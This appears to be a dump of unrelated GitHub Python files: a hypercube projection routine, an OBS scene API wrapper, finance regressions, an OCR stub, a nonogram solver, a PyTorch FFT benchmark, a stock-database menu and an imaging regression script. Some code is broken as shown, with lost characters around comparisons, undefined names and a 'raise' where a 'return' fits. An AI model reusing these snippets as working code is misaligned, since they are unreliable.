# compute sum of all entries in active set\n active_sum = 0.0\n for i in range(C+1,A+1):\n active_sum+=z[sortOrder[i]]\n\n while 1:\n # compute distance to increasing clipped set\n DeltaC = 1-theta-z[sortOrder[C+1]]\n # compute distance to increasing active set\n DeltaA = -theta-z[sortOrder[A+1]]\n Delta = min(DeltaA,DeltaC)\n\n # if we can take a step without changing active and clipped sets\n # and achive sum r, then we are done\n if C+1 + active_sum + (A-C)*(theta+Delta) >= r:\n beta = (r-C-1-active_sum)/(A-C)\n for i in range(n):\n zProj[i] = max(min(z[i]+theta,1.0),0.0)\n break\n else:\n # otherwise, update the active and clipped sets, update\n # the sum of the active set, and update theta.\n if DeltaA==Delta:\n while 1:\n A+=1\n active_sum = active_sum+z[sortOrder[A]]\n if z[sortOrder[A+1]] < (-theta-Delta):\n break\n if DeltaC==Delta:\n while 1:\n C+=1\n active_sum = active_sum-z[sortOrder[C]]\n if z[sortOrder[C+1]] < (1-theta-Delta):\n break\n theta += Delta\n\n\n#@jit('void(double[:], double, double[:], double)', nopython=True, nogil=True)\ndef project_is(z, r, zProj, tol=1.0e-6):\n '''\n Jitted code to compute the ppr projection via binary search.\n\n Input: z: a vector assumed to be a numpy array\n r: the targe sum\n tol: tolerance for the binary search\n\n Returns: zProj projected onto the set\n '''\n n = len(z)\n\n # compute minimum and maximum values of the input\n maxval = z[0]\n minval = z[0]\n for i in range(n):\n if z[i]>maxval:\n maxval = z[i]\n elif z[i] 1e+9:\n # for i in range(n):\n # z[i] = 100*z[i]/extreme\n # maxval = 100*maxval/extreme\n # minval = 100*minval/extreme\n\n # set incredibly conservative upper and lower bounds for theta\n L = -maxval\n U = 1-minval\n\n valU = 1.0*n\n valL = 0.0\n j = 0\n while 1:\n # interpolation search:\n theta = L + ((r - valL)/ (valU - valL))*(U - L)\n\n cur_sum = 0.0\n for i in range(n):\n zProj[i] = max(min(z[i]+theta,1.0),0.0)\n cur_sum += zProj[i]\n\n if abs(cur_sum-r)r:\n U = theta\n valU = cur_sum\n else:\n L = theta\n valL = cur_sum\n j = j + 1\n if j>10000:\n raise ArithmeticError('no projection convergence')\n\ndef project(z, r, alg='is'):\n '''\n Computes a projection onto the subset of the hypercube that sums to r\n using the algorithms described in Barman, Liu, Draper, and Recht, 2011\n or by using interpolation search\n\n Input: z: a vector assumed to be a numpy array\n r: the target sum\n alg: desired algorithm to run (must be 'kkt' or 'is')\n\n Returns: zProj projected onto the set\n '''\n\n n = len(z)\n assert r SceneNode:\n response = await self._connection.command(\n \"addFile\", self._prepared_params([str(path), folder_id])\n )\n raise scenenode_factory(self._connection, response)\n\n async def add_source(\n self, source_id: str, options: Optional[ISceneNodeAddOptions] = None\n ) -> SceneNode:\n options_dict = {}\n if options:\n if options.id is not None:\n option_dict[\"id\"] = options.id\n if options.source_add_options is not None:\n source_add_options = {}\n if options.source_add_options.channel is not None:\n source_add_options[\"channel\"] = options.source_add_options.channel\n if options.source_add_options.is_temporary is not None:\n source_add_options[\n \"isTemporary\"\n ] = options.source_add_options.is_temporary\n options_dict[\"sourceAddOptions\"] = source_add_options\n response = await self._connection.command(\n \"addSource\", self._prepared_params([source_id, options_dict])\n )\n return sceneitem_factory(self._connection, response)\n\n async def can_add_source(self, source_id: str) -> bool:\n response = await self._connection.command(\n \"canAddSource\", self._prepared_params([source_id])\n )\n return response\n\n async def clear(self):\n response = await self._connection.command(\"clear\", self._prepared_params())\n self._check_empty(response)\n\n async def create_and_add_source(\n self, name: str, type_: TSourceType, settings: Optional[dict[Any]] = None\n ): # -> SceneItem:\n response = await self._connection.command(\n \"createAndAddSource\", self._prepared_params([name, type_, settings])\n )\n return sceneitem_factory(self._connection, response)\n\n async def create_folder(self, name: str): # -> SceneItem:\n response = await self._connection.command(\n \"createFolder\", self._prepared_params([name])\n )\n return sceneitemfolder_factory(self._connection, response)\n\n async def get_folder(self, scene_folder_id: str): # -> SceneItemFolder:\n response = await self._connection.command(\n \"getFolder\", self._prepared_params([scene_folder_id])\n )\n return sceneitemfolder_factory(self._connection, response)\n\n async def get_folders(self): # -> list[SceneItemFolder]:\n response = await self._connection.command(\"getFolders\", self._prepared_params())\n return [\n sceneitemfolder_factory(self._connection, subitem) for subitem in response\n ]\n\n async def get_item(self, scene_folder_id: str): # -> Optional[SceneItem]:\n response = await self._connection.command(\n \"getItem\", self._prepared_params([scene_folder_id])\n )\n return sceneitem_factory(self._connection, response) if response else None\n\n async def get_items(self): # -> list[SceneItem]:\n response = await self._connection.command(\"getItems\", self._prepared_params())\n return [sceneitem_factory(self._connection, subitem) for subitem in response]\n\n async def get_model(self):\n response = await self._connection.command(\"getModel\", self._prepared_params())\n return scene_factory(self._connection, response)\n\n async def get_nested_items(self): # -> Source\n response = await self._connection.command(\n \"getNestedItems\", self._prepared_params()\n )\n return [sceneitem_factory(self._connection, source) for source in response]\n\n async def get_nested_scenes(self): # -> Source\n response = await self._connection.command(\n \"getNestedScenes\", self._prepared_params()\n )\n return [scene_factory(self._connection, source) for source in response]\n\n async def get_nested_sources(self): # -> Source\n response = await self._connection.command(\n \"getNestedSources\", self._prepared_params()\n )\n return [source_factory(self._connection, source) for source in response]\n\n async def get_node(self, scene_node_id): # -> Source\n response = await self._connection.command(\n \"getNode\", self._prepared_params([scene_node_id])\n )\n return scenenode_factory(self._connection, source)\n\n async def get_node_by_name(self, name: str) -> Optional[Source]:\n response = await self._connection.command(\n \"getNodeByName\", self._prepared_params([name])\n )\n if not response:\n return None\n else:\n return scenenode_factory(self._connection, response)\n\n async def get_nodes(self): # -> Source\n response = await self._connection.command(\"getNodes\", self._prepared_params())\n result = [scenenode_factory(self._connection, source) for source in response]\n # Update attributes as a side-effect\n self._nodes = result\n return result\n\n async def get_root_nodes(self):\n response = await self._connection.command(\n \"getRootNodes\", self._prepared_params()\n )\n return [scenenode_factory(self._connection, node) for node in response]\n\n async def get_selection(self, ids: Optional[list[str]] = None):\n response = await self._connection.command(\n \"getSelection\", self._prepared_params(ids)\n )\n return selection_factory(self._connection, response)\n\n async def get_source(self):\n response = await self._connection.command(\"getSource\", self._prepared_params())\n return source_factory(self._connection, response)\n\n async def make_active(self):\n response = await self._connection.command(\"makeActive\", self._prepared_params())\n self._check_empty(response)\n\n async def remove(self):\n response = await self._connection.command(\"remove\", self._prepared_params())\n self._check_empty(response)\n\n async def remove_folder(self, folder_id):\n response = await self._connection.command(\n \"removeFolder\", self._prepared_params([folder_id])\n )\n self._check_empty(response)\n\n async def remove_item(self, scene_item_id):\n response = await self._connection.command(\n \"removeItem\", self._prepared_params([scene_item_id])\n )\n self._check_empty(response)\n\n async def set_name(self, new_name):\n response = await self._connection.command(\n \"setName\", self._prepared_params([new_name])\n )\n self._check_empty(response)\n\n # Update local cache.\n self._name = new_name\n\n\nregister(Scene)\n","repo_name":"Julian-O/PySLOBS","sub_path":"pyslobs/slobs/scene.py","file_name":"scene.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"7582251019","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport statsmodels.formula.api as smf\n\ndf = pd.read_csv('r_data.csv')\n\nbase = -1\nmeans = {}\nstart = -0.27 #Set start\nstop = -0.15 #Set stop\nps = []\nrs = []\nbases = []\nroofs = []\nks = []\n\nps_2 = []\nrs_2 = []\nbases_2 = []\nroofs_2 = []\nks_2 = []\n\nps_3 = []\nrs_3 = []\nbases_3 = []\nroofs_3 = []\nks_3 = []\nfor i in range(0, 100):\n base = start + i * 0.0006\n for j in range(0, 100):\n roof = stop - (j * 0.0006)\n df_j = df[df['Autocorrelation'] >= base]\n df_j_2 = df_j[df_j['Autocorrelation'] <= roof] \n\n for k in range(0, 5):\n df_j_2_shifted = df_j_2.copy()\n try:\n df_j_2_shifted['MKT'] = df_j_2_shifted.MKT.shift(k)\n df_j_2_shifted['SMB'] = df_j_2_shifted.SMB.shift(k)\n df_j_2_shifted['HML'] = df_j_2_shifted.HML.shift(k)\n df_j_2_shifted = df_j_2_shifted.dropna(how='any', axis=0)\n except ValueError:\n break\n\n reg = 'HML~Autocorrelation'\n reg2 = 'SMB~Autocorrelation'\n reg3 = 'MKT~Autocorrelation'\n\n try:\n reg_res = smf.ols(reg, df_j_2_shifted).fit()\n reg_res2 = smf.ols(reg2, df_j_2_shifted).fit()\n reg_res3 = smf.ols(reg3, df_j_2_shifted).fit()\n p_value = reg_res.pvalues[1]\n p_value2 = reg_res2.pvalues[1]\n p_value3 = reg_res3.pvalues[1]\n r_value = reg_res.rsquared\n r_value_2 = reg_res2.rsquared\n r_value_3 = reg_res3.rsquared\n\n if p_value <= 0.05:\n ps.append(p_value)\n bases.append(base)\n roofs.append(roof)\n ks.append(k)\n rs.append(r_value)\n if p_value2 <= 0.05:\n ps_2.append(p_value2)\n bases_2.append(base)\n roofs_2.append(roof)\n ks_2.append(k)\n rs_2.append(r_value_2)\n if p_value3 <= 0.05:\n ps_3.append(p_value3)\n bases_3.append(base)\n roofs_3.append(roof)\n ks_3.append(k)\n rs_3.append(r_value_3)\n\n except ValueError:\n break\n\nres_hml = pd.DataFrame(list(zip(bases, roofs, ks, rs)), columns=['Base', 'Roof', 'Lag', 'Rsq'])\nres_smb = pd.DataFrame(list(zip(bases_2, roofs_2, ks_2, rs_2)), columns=['Base', 'Roof', 'Lag', 'Rsq'])\nres_mkt = pd.DataFrame(list(zip(bases_3, roofs_3, ks_3, rs_3)), columns=['Base', 'Roof', 'Lag', 'Rsq'])\n\nres_hml.to_csv(r'res_hml_treshold_neg_1.csv')\nres_smb.to_csv(r'res_smb_treshold_neg_1.csv')\nres_mkt.to_csv(r'res_mkt_treshold_neg_1.csv')","repo_name":"fl0wZyy/honors_thesis_code","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39667683409","text":"import pytesseract\nfrom PIL import Image\n\nimg = Image.open('') # relative path to image\npytesseract.pytesseract.tesseract_cmd = r''\n\ncustom_config = r'--oem 3 --psm 6'\n\ntext = pytesseract.image_to_string(img, config=custom_config)\n\nwith open('', 'w') as text_file: # text file for text from picture\n text_file.write(text)\n","repo_name":"vvv2006v/image-text-recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16584658812","text":"from scipy.fftpack import fft\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import*\nfrom scipy.io import wavfile\n\ny = [683, 766, 812, 912, 1024, 1085, 1230]\n\nx = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\"]\nplt.plot(y)\n\nylabel('Frequency')\nxlabel(x[0]+\" \"+\n x[1]+\" \"+\n x[2]+\" \"+\n x[3]+\" \"+\n x[4]+\" \"+\n x[5]+\" \"+\n x[6]+\" \")\n\nplt.grid()\nplt.show()\n","repo_name":"GBortoto/Unknown","sub_path":"Plot - Notas.py","file_name":"Plot - Notas.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7336261372","text":"hints = [1,5,1]\na = [0,0,0,0,0,0,0,0,0,0]\nb = [0,1,0,0,0,0,0,0,0,0]\nc = [0,1,0,1,1,1,1,1,0,0]\nd = [0,1,0,1,1,1,1,1,0,1]\ne = [1,0,1,1,1,1,1,0,1,0]\n\ndef space():\n return [0 for i in range(20)]\n \nhints_2 = [6,6,6]\n\ndef len_hints(arr):\n return sum(arr) + len(arr) - 1\n \ndef how_many_counted(arr):\n seen = False\n blanks = 0\n for el in arr:\n if el == 0:\n if not seen:\n blanks += 1\n else:\n if not seen:\n blanks += 1\n seen = True\n # print('returning blanks:',blanks)\n return blanks\n \ndef usable_space(space):\n res = []\n space_sum = sum(space)\n if space_sum == 0:\n return space, space_sum\n i = len(space) - 1\n while i in range(len(space)):\n if space[i] == 1:\n i += 1\n break\n i -= 1\n if i >= 0:\n i += 1\n space_sum += how_many_counted(space[:i + 1])\n # print('returning i:',i)\n # print(space[i:])\n return space[i:], space_sum\n \n \ndef calc_diff(arr, space, index):\n length = len(arr)\n if length <= index:\n # print('already finished!')\n return -1\n print('fitting ' + str(arr) + ' into ' + str(space) + ' starting at ' + str(arr[index]))\n new_space, space_to_remove = usable_space(space)\n spaces_len = len(new_space)\n v = (sum(arr[:index]))\n # print('v',v)\n covered_space = sum(space)\n to_be_covered = sum(arr)\n space_left_to_cover = len_hints(arr[index:])\n arr_len = space_left_to_cover\n if covered_space == to_be_covered:\n # print('base')\n return -1\n # print('new_space',new_space)\n # print('space_to_remove',space_to_remove)\n # print('spaces_len',spaces_len)\n # print('arr_len',arr_len)\n return spaces_len - arr_len\n \ndef calc_buffer_size(arr, space, index):\n pass\n\nhints_length = len_hints(hints)\n# print(hints_length)\n\nprint('a_diff:', calc_diff(hints, a, 0) == 1)\n# print('\\n')\nprint('b_diff:', calc_diff(hints, b, 1) == 0)\n# print('\\n')\nprint('c_diff:', calc_diff(hints, c, 2) == 0)\n# print('\\n')\nprint('d_diff:', calc_diff(hints, d, 2) == -1)\n# print('\\n')\nprint('e_diff:', calc_diff(hints, e, 3) == -1)\n# print('\\n')\nprint('large_diff:', calc_diff(hints_2, space(), 0) == 0)\n# print('\\n')\nprint('large_diff:', calc_diff([18], space(), 0) == 2)\n# print('\\n')\nprint('large_diff:', calc_diff([5,5,5], space(), 0) == 3)\n# print('\\n')\n\nten_ones = [1 for i in range(10)]\nprint('large_diff:', calc_diff([10,4,4], (ten_ones + space()[:-10]), 1) == 0)\n\ndef fill_row(row, hints, index, buff):\n hint = hints[index]\n new_row = row#.copy()\n left_hints = hints[:index]\n right_hints = hints[index:]\n left_space = len_hints(left_hints) + 1\n right_space = len_hints(right_hints)\n left_puzzle_sum = sum(row[:left_space])\n if left_puzzle_sum == 0:\n buff -= left_space\n # right_puzzle_sum = sum(row[right_space:])\n # print('left_hints:',left_hints,' right_hints:',right_hints,' left_space:',left_space,' right_space:', right_space,' buff:',buff)\n i = 0\n while i in range(len(new_row)):\n #print(new_row[i])\n left = left_space + buff\n right = (len(new_row) - (right_space + buff)) + hint\n # print('left:',left,' right',right)\n if hint > 0 and hint > buff:\n if i >= left and i < right: # or ((i) == left == right == buff):\n new_row[i] = 1\n i += 1\n # print('new_row:',new_row)\n return new_row\n\ndef horizontal_row_fill(puzzle_row, hints):\n i = 0\n temp_row = puzzle_row.copy()\n while i in range(len(hints)):\n buffer_space = calc_diff(hints, puzzle_row, i)\n # print('buffer_space:',buffer_space)\n temp_row = fill_row(puzzle_row, hints, i, buffer_space)\n \n i += 1\n # if i == len(hints):\n # return temp_row\n return temp_row\n \ndef ten_space():\n return [0 for i in range(10)]\nprint()\nprint(horizontal_row_fill(space(), hints_2) == [1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1])\nprint(horizontal_row_fill(space(), [5,5,5]) == [0,0,0,1,1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,0])\nprint(horizontal_row_fill(space(), [18]) == [0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0])\nprint(horizontal_row_fill(ten_space(), hints) == [0,0,0,1,1,1,1,0,0,0])\nprint(horizontal_row_fill(ten_space(), [1]) == ten_space())\nprint(horizontal_row_fill(ten_space(), [6]) == [0,0,0,0,1,1,0,0,0,0])\nprint(horizontal_row_fill(ten_space(), [4,5]) == [1,1,1,1,0,1,1,1,1,1])\nprint(horizontal_row_fill(ten_space(), [7]) == [0,0,0,1,1,1,1,0,0,0])\n\nsample_smiley = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0],\n [0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0],\n [0, 1, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 0],\n [0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0],\n [0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0],\n [0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0],\n [0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0]]\nsample_smiley_h_hints = [[0],[11],[1,1],[1,3,3,1],[1,3,3,1],[1,1],[1,9,1],[1,7,1],[2,2],[11]]\n \ncount_index = 0\nnew_puzzle = [[0 for i in range(17)] for j in range(len(sample_smiley_h_hints))]\nwhile count_index in range(len(sample_smiley_h_hints)):\n new_puzzle[count_index] = horizontal_row_fill(new_puzzle[count_index], sample_smiley_h_hints[count_index])\n count_index += 1\nprint(new_puzzle)\n\ndef printA(arr):\n for row in arr:\n print(row)\nprintA(new_puzzle)\n \n ","repo_name":"abriggs914/Pygames","sub_path":"Pixel Puzzle Solver/Mark1/horizontal_hint_solver.py","file_name":"horizontal_hint_solver.py","file_ext":"py","file_size_in_byte":5730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14833931679","text":"\"\"\"Microbenchmarks for the torch.fft module\"\"\"\nfrom argparse import ArgumentParser\nfrom collections import namedtuple\nfrom collections.abc import Iterable\n\nimport torch\nimport torch.fft\nfrom torch.utils import benchmark\nfrom torch.utils.benchmark.op_fuzzers.spectral import SpectralOpFuzzer\n\n\ndef _dim_options(ndim):\n if ndim == 1:\n return [None]\n elif ndim == 2:\n return [0, 1, None]\n elif ndim == 3:\n return [0, 1, 2, (0, 1), (0, 2), None]\n raise ValueError(f\"Expected ndim in range 1-3, got {ndim}\")\n\n\ndef run_benchmark(name: str, function: object, dtype: torch.dtype, seed: int, device: str, samples: int,\n probability_regular: float):\n cuda = device == 'cuda'\n spectral_fuzzer = SpectralOpFuzzer(seed=seed, dtype=dtype, cuda=cuda,\n probability_regular=probability_regular)\n results = []\n for tensors, tensor_params, params in spectral_fuzzer.take(samples):\n shape = [params['k0'], params['k1'], params['k2']][:params['ndim']]\n str_shape = ' x '.join([f\"{s:<4}\" for s in shape])\n sub_label = f\"{str_shape} {'' if tensor_params['x']['is_contiguous'] else '(discontiguous)'}\"\n for dim in _dim_options(params['ndim']):\n for nthreads in (1, 4, 16) if not cuda else (1,):\n measurement = benchmark.Timer(\n stmt='func(x, dim=dim)',\n globals={'func': function, 'x': tensors['x'], 'dim': dim},\n label=f\"{name}_{device}\",\n sub_label=sub_label,\n description=f\"dim={dim}\",\n num_threads=nthreads,\n ).blocked_autorange(min_run_time=1)\n measurement.metadata = {\n 'name': name,\n 'device': device,\n 'dim': dim,\n 'shape': shape,\n }\n measurement.metadata.update(tensor_params['x'])\n results.append(measurement)\n return results\n\n\nBenchmark = namedtuple('Benchmark', ['name', 'function', 'dtype'])\nBENCHMARKS = [\n Benchmark('fft_real', torch.fft.fftn, torch.float32),\n Benchmark('fft_complex', torch.fft.fftn, torch.complex64),\n Benchmark('ifft', torch.fft.ifftn, torch.complex64),\n Benchmark('rfft', torch.fft.rfftn, torch.float32),\n Benchmark('irfft', torch.fft.irfftn, torch.complex64),\n]\nBENCHMARK_MAP = {b.name: b for b in BENCHMARKS}\nBENCHMARK_NAMES = [b.name for b in BENCHMARKS]\nDEVICE_NAMES = ['cpu', 'cuda']\n\ndef _output_csv(file, results):\n file.write('benchmark,device,num_threads,numel,shape,contiguous,dim,mean (us),median (us),iqr (us)\\n')\n for measurement in results:\n metadata = measurement.metadata\n device, dim, shape, name, numel, contiguous = (\n metadata['device'], metadata['dim'], metadata['shape'],\n metadata['name'], metadata['numel'], metadata['is_contiguous'])\n\n if isinstance(dim, Iterable):\n dim_str = '-'.join(str(d) for d in dim)\n else:\n dim_str = str(dim)\n shape_str = 'x'.join(str(s) for s in shape)\n\n print(name, device, measurement.task_spec.num_threads, numel, shape_str, contiguous, dim_str,\n measurement.mean * 1e6, measurement.median * 1e6, measurement.iqr * 1e6,\n sep=',', file=file)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description=__doc__)\n parser.add_argument('--device', type=str, choices=DEVICE_NAMES, nargs='+', default=DEVICE_NAMES)\n parser.add_argument('--bench', type=str, choices=BENCHMARK_NAMES, nargs='+', default=BENCHMARK_NAMES)\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--samples', type=int, default=10)\n parser.add_argument('--probability-regular', '--probability_regular', type=float, default=1.0)\n parser.add_argument('-o', '--output', type=str)\n args = parser.parse_args()\n\n num_benchmarks = len(args.device) * len(args.bench)\n i = 0\n results = []\n for device in args.device:\n for bench in (BENCHMARK_MAP[b] for b in args.bench):\n results += run_benchmark(\n name=bench.name, function=bench.function, dtype=bench.dtype,\n seed=args.seed, device=device, samples=args.samples,\n probability_regular=args.probability_regular)\n i += 1\n print(f'Completed {bench.name} benchmark on {device} ({i} of {num_benchmarks})')\n\n if args.output is not None:\n with open(args.output, 'w') as f:\n _output_csv(f, results)\n\n compare = benchmark.Compare(results)\n compare.trim_significant_figures()\n compare.colorize()\n compare.print()\n","repo_name":"pytorch/pytorch","sub_path":"torch/utils/benchmark/examples/spectral_ops_fuzz_test.py","file_name":"spectral_ops_fuzz_test.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"10423813779","text":"from DbConnection import DbConnection\nimport pandas as pd\nimport matplotlib.pyplot as plot\n\n\nclass Trader:\n def __init__(self):\n self.__str__ = \"Trader\"\n self.email = \"\"\n self.company = \"\"\n self.db = DbConnection('market', 'stocks') # create database connection object\n self.menu_options = [x for x in dir(self) if x.startswith(\"m_\")] # create options menu for user using class attributes\n\n while True:\n self._menu()\n # get input from user prompt and call the appropriate function name\n try:\n option_num = int(input(\"Enter option number and press ENTER, or 0 to quit: \"))\n if option_num == 0:\n print(\"Good bye!\")\n return\n try:\n func = getattr(self, self.menu[option_num])\n print(func())\n except AttributeError:\n print(\"Unable to retrieve function name %s from menu option\" % self.menu[option_num])\n except:\n print(\"Invalid option\")\n\n def _menu(self):\n print(\"\\nMenu\\n====\")\n self.menu = {}\n menu_item_number = 1\n for item in self.menu_options:\n self.menu[menu_item_number] = item\n menu_item_number += 1\n for option_num, option_name in self.menu.items():\n print(\"%s. %s\" % (option_num, option_name))\n\n def m_get_industry_tickers(self):\n \"\"\"Get Industry tickers\"\"\"\n industry = input(\"Enter name of industry and press ENTER: \")\n return self.db.get_industry_tickers(industry)\n\n def m_get_countries(self):\n \"\"\"Get list of countries\"\"\"\n countries = self.db.get_countries()\n print(\"\\nCountries\\n=======\")\n for country in countries:\n print(country)\n\n def m_get_sectors(self):\n \"\"\"Get list of sectors\"\"\"\n sectors = self.db.get_sectors()\n print(\"\\nSectors\\n=======\")\n for sector in sectors:\n print(sector)\n\n def m_get_industries(self):\n \"\"\"Get list of industries\"\"\"\n industries = self.db.get_industries()\n print(\"\\nIndustries\\n=======\")\n for industry in industries:\n print(industry)\n\n def m_get_50_day_simple_moving_avg_count(self):\n \"\"\"Get 50 day simple moving average count\"\"\"\n low = input(\"Enter lower threshold value for 50 day average count and press ENTER: \")\n high = input(\"Enter high threshold value for 50 day average count and press ENTER: \")\n return self.db.get_50_day_simple_moving_avg_count(low, high)\n\n def m_get_total_outstanding_shares_by_sector(self):\n \"\"\"Get total outstanding shares by sector\"\"\"\n sector = input(\"Enter name of sector and press ENTER: \")\n return self.db.get_total_outstanding_shares_by_sector(sector)\n\n def m_get_analyst_recommendation_score(self): # new function\n \"\"\"Get tickers recommended by analysts where score greater than low\"\"\"\n ticker = input(\"Enter name of ticker and press ENTER: \")\n return self.db.get_analyst_recommendation_score(ticker)\n\n def m_plot_stock_price_by_sector_by_country(self):\n \"\"\"Generate box plot for stock prices by sector by country\"\"\"\n sector = input(\"Enter name of sector and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_price_by_sector_by_country(sector, country)\n data_frame = pd.DataFrame(dataset, columns=['Price', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Price', rot=90, title=\"Stock prices for %s sector in %s\" % (sector, country))\n plot.show(block=True)\n except TypeError:\n print(\"No data to plot\")\n\n def m_plot_stock_price_by_industry_by_country(self):\n \"\"\"Generate box plot for stock prices by industry by country\"\"\"\n industry = input(\"Enter name of industry and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_price_by_industry_by_country(industry, country)\n data_frame = pd.DataFrame(dataset, columns=['Price', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Price', rot=90,\n title=\"Stock prices for %s industry in %s\" % (industry, country))\n plot.show(block=True)\n except TypeError:\n print(\"No data to plot\")\n\n def m_plot_stock_recommendation_score_by_sector_by_country(self):\n \"\"\"Generate box plot for stock recommendation scores by sector by country\"\"\"\n sector = input(\"Enter name of sector and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_recommendation_score_by_sector_by_country(sector, country)\n data_frame = pd.DataFrame(dataset, columns=['Analyst Recom', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Analyst Recom', rot=90, title=\"Analyst recommendation scores for %s sector in %s\" % (sector, country))\n plot.show(block=True)\n except TypeError:\n print(\"No Data to plot\")\n\n def m_plot_stock_recommendation_score_by_industry_by_country(self):\n \"\"\"Generate box plot for stock recommendation scores by sector by country\"\"\"\n industry = input(\"Enter name of industry and press ENTER: \")\n country = input(\"Enter name of country and press ENTER: \")\n dataset = self.db.get_stock_recommendation_score_by_industry_by_country(industry, country)\n data_frame = pd.DataFrame(dataset, columns=['Analyst Recom', 'Ticker'])\n try:\n data_frame.plot.bar(x='Ticker', y='Analyst Recom', rot=90,\n title=\"Analyst recommendation scores for %s industry in %s\" % (industry, country))\n plot.show(block=True)\n except TypeError:\n print(\"No Data to plot\")\n\n\nclass Manager(Trader):\n def __init__(self):\n super().__init__()\n self.__str__ = \"Hedge Fund Manager\"\n \n\n def m_create_document(self):\n \"\"\"Create document\"\"\"\n document = input(\"Enter Document in key, value pair format and press ENTER: \")\n return self.db.create_document(document)\n\n def m_update_volume(self):\n \"\"\"Update ticker volume\"\"\"\n ticker = input(\"Enter ticker symbol and press ENTER: \")\n volume = input(\"Enter volume for ticker and press ENTER: \")\n return self.db.update_volume(ticker, volume)\n\n \n \n \n\n def m_delete_document(self):\n \"\"\"Delete document\"\"\"\n ticker = input(\"Enter ticker symbol and press ENTER: \")\n return self.db.delete_document(ticker)\n\n def m_update_analyst_recommendation_score(self):\n \"\"\"Update analyst recommendation score\"\"\"\n ticker = input(\"Enter ticker symbol and press ENTER: \")\n score = input(\"Enter new score: \")\n return self.db.update_recommendation(ticker, score)\n\n\n\n","repo_name":"felixt-snhu/felixt-snhu.github.io","sub_path":"capstone_project/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42383216883","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport h5py\nimport matplotlib.pyplot as plt\nimport ThermalImagingAnalysis as tai\nimport ActivityPatterns as ap\nimport numpy as np\nfrom sklearn.metrics import f1_score\n\npPenalty = \"Penalty_Gaussian_1024fr_2.5Hz_TruncatedWaveletBasis.mat\"\n#pData = \"sep_1072240.mat\"\npData = \"../../SEP/626510_sep.mat\"\n\nf = h5py.File(pData, \"r\")\nS = f[\"S1024\"].value\n#S = f[\"img\"].value\n#T = f[\"T\"].value\nT = f[\"T1024\"].value\n\nf_P = h5py.File(pPenalty, \"r\")\nP = f_P[\"BPdir2\"].value # learned penalty matrix\nprint('[INFO] P is being transposed\\n')\nP = P.transpose() # P appears to be stored as transposed version of itself\nB = f_P[\"B\"].value # basis matrix\n\nS2 = S[0:1024,]\nT2 = T[0:1024,]\ndel S;\ndel T;\n\nX = ap.computeGaussianActivityPattern(np.squeeze(T2)).transpose();\nZ = tai.semiparamRegressionRaw(S2,X,B,P);\n\nZ_true = groundtruthImg.flatten()\nfor i in range(len(Z_true)):\n if Z_true[i] != 0:\n Z_true[i] = 1\n else:\n Z_true[i] = 0\n\nZ_pred = numpy.zeros(len(Z_true))\nfor i in range(len(Z_pred)):\n if Z[i] >= 5.2:\n Z_pred[i] = 1\n else:\n Z_pred[i] = 0\n \nF1 = f1_score(Z_true, Z_pred, average='binary')\n\n\n\nwith h5py.File(\"result.h5\",\"w\") as f:\n d1 = f.create_dataset('Z',data=Z)\n","repo_name":"nish03/MRF-in-Neural-Imaging","sub_path":"semiparamRegression/applyModel_noMRF.py","file_name":"applyModel_noMRF.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"69889692072","text":"# Author: Christian Brodbeck \nimport fnmatch\nimport re\n\nimport numpy as np\n\nfrom .._data_obj import cellname\nfrom . import stats\nfrom .contrast import parse\n\n\n# array functions: work on array, take axis argument\nnp_afuncs = {'min': np.min,\n 'max': np.max,\n 'sum': np.sum}\n# binary functions: work on two 